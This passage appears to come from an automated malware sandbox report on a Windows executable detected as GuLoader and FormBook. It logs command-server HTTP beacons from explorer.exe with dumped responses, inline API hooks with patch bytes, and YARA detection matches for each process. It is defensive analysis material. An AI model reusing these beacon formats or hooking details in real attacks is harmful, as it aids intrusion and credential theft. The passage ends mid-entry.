                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            5192.168.11.204977523.227.38.7480C:\Windows\explorer.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            May 12, 2022 10:49:05.560945034 CEST8204OUTGET /wn19/?jZf=74kz/+Omydv/tJV+ps5/T47bI5nxKh+DjdkrvIsUcwHn/m5f3NJjyQUUG1A7gP1GNjyQ&k0=p8cH HTTP/1.1
                                                                                                                            Host: www.nelvashop.com
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                                                            Data Ascii:
                                                                                                                            May 12, 2022 10:49:05.660070896 CEST8205INHTTP/1.1 403 Forbidden
                                                                                                                            Date: Thu, 12 May 2022 08:49:05 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            X-Sorting-Hat-PodId: 178
                                                                                                                            X-Sorting-Hat-ShopId: 62108663987
                                                                                                                            X-Dc: gcp-europe-west1
                                                                                                                            X-Request-ID: 550f7f4f-456b-4f4f-8965-3ea51e57b588
                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                            X-Download-Options: noopen
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            X-Permitted-Cross-Domain-Policies: none
                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 70a1e629cab2915e-FRA
                                                                                                                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                            Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c
                                                                                                                            Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;al
                                                                                                                            May 12, 2022 10:49:05.660132885 CEST8206INData Raw: 69 67 6e 2d 69 74 65 6d 73 3a 73 74 61 72 74 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 2e 36 72 65 6d 7d 2e 61 63 74 69 6f 6e 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 41 39 41 39 41 39 3b 70 61 64 64 69 6e 67 3a 31 2e 32 72
                                                                                                                            Data Ascii: ign-items:start;margin-bottom:1.6rem}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{borde
                                                                                                                            May 12, 2022 10:49:05.660181046 CEST8208INData Raw: 20 22 63 6f 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 4e 6f 20 74 69 65 6e 65 73 20 70 65 72 6d 69 73 6f 20 70 61 72 61 20 61 63 63 65 64 65 72 20 61 20 65 73 74 61 20 70 c3 a1 67 69 6e 61 20 77 65 62 22 0a 20 20 7d 2c 0a 20 20 22 6b 6f 22 3a
                                                                                                                            Data Ascii: "content-title": "No tienes permiso para acceder a esta pgina web" }, "ko": { "title": " ", "content-title": " " }, "da": { "title": "
                                                                                                                            May 12, 2022 10:49:05.660227060 CEST8209INData Raw: 86 e0 a4 aa e0 a4 95 e0 a5 8b 20 e0 a4 87 e0 a4 b8 20 e0 a4 b5 e0 a5 87 e0 a4 ac e0 a4 b8 e0 a4 be e0 a4 87 e0 a4 9f 20 e0 a4 a4 e0 a4 95 20 e0 a4 aa e0 a4 b9 e0 a5 81 e0 a4 82 e0 a4 9a 20 e0 a4 aa e0 a5 8d e0 a4 b0 e0 a4 be e0 a4 aa e0 a5 8d e0
                                                                                                                            Data Ascii: " }, "ja": { "title": "", "content-title": "
                                                                                                                            May 12, 2022 10:49:05.660263062 CEST8210INData Raw: 20 74 72 61 6e 73 6c 61 74 69 6f 6e 73 29 20 7b 0a 20 20 20 20 74 61 72 67 65 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 5b 64 61 74 61 2d 69 31 38 6e 3d 22 20 2b 20 69 64 20 2b 20 22 5d 22 29 3b 0a 20 20
                                                                                                                            Data Ascii: translations) { target = document.querySelector("[data-i18n=" + id + "]"); if (target != undefined) { target.innerHTML = translations[id]; } } // Replace title tage document.title = translations["title"]; // Replace
                                                                                                                            May 12, 2022 10:49:05.660295010 CEST8210INData Raw: 30 0d 0a 0d 0a
                                                                                                                            Data Ascii: 0


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            6192.168.11.204977623.227.38.7480C:\Windows\explorer.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            May 12, 2022 10:49:26.026441097 CEST8211OUTGET /wn19/?jZf=rv1HgXCmNvTRWnk0t/PWMZTArWSxwY6VToXu23C5wd0SYVqo5hbnUnFufPtPTohMYlmc&k0=p8cH HTTP/1.1
                                                                                                                            Host: www.threads34.store
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                                                            Data Ascii:
                                                                                                                            May 12, 2022 10:49:26.084886074 CEST8212INHTTP/1.1 403 Forbidden
                                                                                                                            Date: Thu, 12 May 2022 08:49:26 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            X-Sorting-Hat-PodId: 152
                                                                                                                            X-Sorting-Hat-ShopId: 60890513561
                                                                                                                            X-Dc: gcp-europe-west1
                                                                                                                            X-Request-ID: 02e2ed5e-cb87-4eff-bfdf-9330f6164dc4
                                                                                                                            X-Download-Options: noopen
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            X-Permitted-Cross-Domain-Policies: none
                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 70a1e6a9ab9f900a-FRA
                                                                                                                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                            Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c
                                                                                                                            Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;al
                                                                                                                            May 12, 2022 10:49:26.084947109 CEST8214INData Raw: 69 67 6e 2d 69 74 65 6d 73 3a 73 74 61 72 74 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 2e 36 72 65 6d 7d 2e 61 63 74 69 6f 6e 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 41 39 41 39 41 39 3b 70 61 64 64 69 6e 67 3a 31 2e 32 72
                                                                                                                            Data Ascii: ign-items:start;margin-bottom:1.6rem}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{borde
                                                                                                                            May 12, 2022 10:49:26.084994078 CEST8215INData Raw: 20 22 63 6f 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 4e 6f 20 74 69 65 6e 65 73 20 70 65 72 6d 69 73 6f 20 70 61 72 61 20 61 63 63 65 64 65 72 20 61 20 65 73 74 61 20 70 c3 a1 67 69 6e 61 20 77 65 62 22 0a 20 20 7d 2c 0a 20 20 22 6b 6f 22 3a
                                                                                                                            Data Ascii: "content-title": "No tienes permiso para acceder a esta pgina web" }, "ko": { "title": " ", "content-title": " " }, "da": { "title": "
                                                                                                                            May 12, 2022 10:49:26.085040092 CEST8216INData Raw: 86 e0 a4 aa e0 a4 95 e0 a5 8b 20 e0 a4 87 e0 a4 b8 20 e0 a4 b5 e0 a5 87 e0 a4 ac e0 a4 b8 e0 a4 be e0 a4 87 e0 a4 9f 20 e0 a4 a4 e0 a4 95 20 e0 a4 aa e0 a4 b9 e0 a5 81 e0 a4 82 e0 a4 9a 20 e0 a4 aa e0 a5 8d e0 a4 b0 e0 a4 be e0 a4 aa e0 a5 8d e0
                                                                                                                            Data Ascii: " }, "ja": { "title": "", "content-title": "
                                                                                                                            May 12, 2022 10:49:26.085084915 CEST8217INData Raw: 20 74 72 61 6e 73 6c 61 74 69 6f 6e 73 29 20 7b 0a 20 20 20 20 74 61 72 67 65 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 5b 64 61 74 61 2d 69 31 38 6e 3d 22 20 2b 20 69 64 20 2b 20 22 5d 22 29 3b 0a 20 20
                                                                                                                            Data Ascii: translations) { target = document.querySelector("[data-i18n=" + id + "]"); if (target != undefined) { target.innerHTML = translations[id]; } } // Replace title tage document.title = translations["title"]; // Replace
                                                                                                                            May 12, 2022 10:49:26.085108042 CEST8217INData Raw: 30 0d 0a 0d 0a
                                                                                                                            Data Ascii: 0


                                                                                                                            Code Manipulations

                                                                                                                            User Modules

                                                                                                                            Hook Summary

                                                                                                                            Function NameHook TypeActive in Processes
                                                                                                                            PeekMessageAINLINEexplorer.exe
                                                                                                                            PeekMessageWINLINEexplorer.exe
                                                                                                                            GetMessageWINLINEexplorer.exe
                                                                                                                            GetMessageAINLINEexplorer.exe

                                                                                                                            Processes

                                                                                                                            Process: explorer.exe, Module: user32.dll
                                                                                                                            Function NameHook TypeNew Data
                                                                                                                            PeekMessageAINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xED
                                                                                                                            PeekMessageWINLINE0x48 0x8B 0xB8 0x85 0x5E 0xED
                                                                                                                            GetMessageWINLINE0x48 0x8B 0xB8 0x85 0x5E 0xED
                                                                                                                            GetMessageAINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xED

                                                                                                                            Statistics

                                                                                                                            CPU Usage

                                                                                                                            Click to jump to process

                                                                                                                            Memory Usage

                                                                                                                            Click to jump to process

                                                                                                                            High Level Behavior Distribution

                                                                                                                            Click to dive into process behavior distribution

                                                                                                                            Behavior

                                                                                                                            Click to jump to process

                                                                                                                            System Behavior

                                                                                                                            General

                                                                                                                            Target ID:1
                                                                                                                            Start time:10:41:24
                                                                                                                            Start date:12/05/2022
                                                                                                                            Path:C:\Users\user\Desktop\aSsc9zh1ex.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\user\Desktop\aSsc9zh1ex.exe"
                                                                                                                            Imagebase:0x400000
                                                                                                                            File size:326847 bytes
                                                                                                                            MD5 hash:D5E55A57372BCAD45FBB260105179CAF
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.41964484846.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            Reputation:low

                                                                                                                            General

                                                                                                                            Target ID:7
                                                                                                                            Start time:10:41:44
                                                                                                                            Start date:12/05/2022
                                                                                                                            Path:C:\Users\user\Desktop\aSsc9zh1ex.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\user\Desktop\aSsc9zh1ex.exe"
                                                                                                                            Imagebase:0x400000
                                                                                                                            File size:326847 bytes
                                                                                                                            MD5 hash:D5E55A57372BCAD45FBB260105179CAF
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000007.00000000.41769049306.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.42265914211.000000001D3A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.42265914211.000000001D3A0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.42265914211.000000001D3A0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.42240670582.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.42240670582.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.42240670582.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                            Reputation:low

                                                                                                                            General

                                                                                                                            Target ID:10
                                                                                                                            Start time:10:41:58
                                                                                                                            Start date:12/05/2022
                                                                                                                            Path:C:\Windows\explorer.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\Explorer.EXE
                                                                                                                            Imagebase:0x7ff6a47b0000
                                                                                                                            File size:4849904 bytes
                                                                                                                            MD5 hash:5EA66FF5AE5612F921BC9DA23BAC95F7
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.42010338948.000000001441C000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.42010338948.000000001441C000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.42010338948.000000001441C000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.42080260452.000000001441C000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.42080260452.000000001441C000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.42080260452.000000001441C000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                            Reputation:moderate

                                                                                                                            General

                                                                                                                            Target ID:14
                                                                                                                            Start time:10:42:29
                                                                                                                            Start date:12/05/2022
                                                                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                            Imagebase:0x8a0000
                                                                                                                            File size:61440 bytes
                                                                                                                            MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.46595730295.00000000043D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.46595730295.00000000043D0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.46595730295.00000000043D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.46593481417.0000000000530000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.46593481417.0000000000530000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.46593481417.0000000000530000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.46596157164.0000000004400000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.46596157164.0000000004400000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.46596157164.0000000004400000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                            Reputation:moderate

                                                                                                                            General

                                                                                                                            Target ID:15
                                                                                                                            Start time:10:42:33
                                                                                                                            Start date:12/05/2022
